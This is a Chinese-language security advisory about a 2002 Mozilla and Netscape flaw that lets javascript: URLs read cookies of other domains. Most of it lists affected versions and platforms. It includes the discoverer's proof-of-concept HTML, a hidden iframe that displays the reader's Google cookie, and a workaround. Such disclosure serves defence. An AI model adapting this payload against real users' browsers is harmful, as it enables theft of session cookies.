|
|
Mozilla JavaScript URL Host欺骗任意COOKIE可访问漏洞
发布时间:2002-07-27
更新时间:2002-07-27
严重程度:中
威胁程度:用户敏感信息泄露
错误类型:访问验证错误
利用方式:服务器模式
BUGTRAQ ID:5293
受影响系统Mozilla Browser 0.9.2 .1
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows XP
Mozilla Browser 0.9.2
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
+ Conectiva Linux 6.0
+ Conectiva Linux 7.0
+ Conectiva Linux 8.0
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows XP
Mozilla Browser 0.9.3
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows XP
Mozilla Browser 0.9.4 .1
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows XP
Mozilla Browser 0.9.4
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
+ Conectiva Linux 6.0
+ Conectiva Linux 7.0
+ Conectiva Linux 8.0
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows XP
Mozilla Browser 0.9.5
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows XP
Mozilla Browser 0.9.6
- Apple MacOS 9.0
- Apple MacOS 9.1
- Apple MacOS 9.2
- Be BeOS 5.0
- BSDI BSD/OS 4.2
- Compaq OpenVMS 7.1 -2 Alpha
- Compaq OpenVMS 7.2 -2 Alpha
- Compaq OpenVMS 7.3 Alpha
- FreeBSD FreeBSD 4.0
- IBM AIX 4.3.3
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6a
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 sparc
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 sparc
- SGI IRIX 6.5
- Sun Solaris 2.7
- Sun Solaris 2.8
Mozilla Browser 0.9.7
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows XP
Mozilla Browser 0.9.8
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS 9.2.2
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows XP
Mozilla Browser 0.9.9
- FreeBSD FreeBSD 4.1.1
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 4.3
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.5
+ RedHat Linux 7.2
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 i586
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.3
+ RedHat Linux 7.3 i386
Mozilla Browser 1.0 RC2
+ Conectiva Linux 6.0
+ Conectiva Linux 7.0
+ Conectiva Linux 8.0
Mozilla Browser 1.0 RC1
- FreeBSD FreeBSD 4.1.1
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 4.3
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.5
Mozilla Browser 1.0
Mozilla Browser 1.1 Alpha
Netscape Netscape 6.0 1
- HP HP-UX 11.0
- HP HP-UX 11.11
- Microsoft Windows 2000 Workstation
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
Netscape Netscape 6.0 Mac
Netscape Netscape 6.0
- Microsoft Windows 2000 Workstation
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
Netscape Netscape 6.1
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows XP
Netscape Netscape 6.2
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows XP
Netscape Netscape 6.2.1
- Apple MacOS 9.0
- Apple MacOS 9.0.4
- Apple MacOS 9.1
- Apple MacOS 9.2
- Apple MacOS 9.2.1
- Apple MacOS X 10.0
- Apple MacOS X 10.0.1
- Apple MacOS X 10.0.2
- Apple MacOS X 10.0.3
- Apple MacOS X 10.0.4
- Apple MacOS X 10.1
- Apple MacOS X 10.1.1
- Apple MacOS X 10.1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows XP
Netscape Netscape 6.2.2 详细描述
Mozilla是开放源代码的WEB浏览器,支持多种系统。Mozilla浏览器允许恶意脚本代码访问关联任意域中的COOKIE数据。
Mozilla允许使用javascript: URL设置和读取COOKIE,COOKIE安全设置只限制访问正确匹配主机和路径。通过建立恶意Javascript URL在新的frame/iframe/window中打开URL,可能造成访问其他域中的任意COOKIE数据,导致信息泄露。
测试代码
-------------------------- CUT HERE ----------------------------
<pre>
Title: Mozilla cookie stealing/spoofing
Date: [2002-07-24]
Impact: Steal/spoof arbitrary cookie _ _
using javascript: URLs o' \,=./ `o
Author: Andreas Sandblad, sandblad@acc.umu.se (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
This demo will display your google cookie (must exist).
</pre>
<body onload=init()>
<iframe name=f height=0 width=0 style=visibility:hidden></iframe>
<script>
function init(){
f.location = "javascript://www.google.com/\n"+
"'<body onload=alert(document.cookie)>'";
}
</script>
-------------------------- CUT HERE ----------------------------
解决方案
在高级选项中关闭access to cookies using javascript。
相关信息
Andreas Sandblad <sandblad@acc.umu.se>.
参考:http://online.securityfocus.com/archive/1/284012
相关主页:http://www.mozilla.org/
|
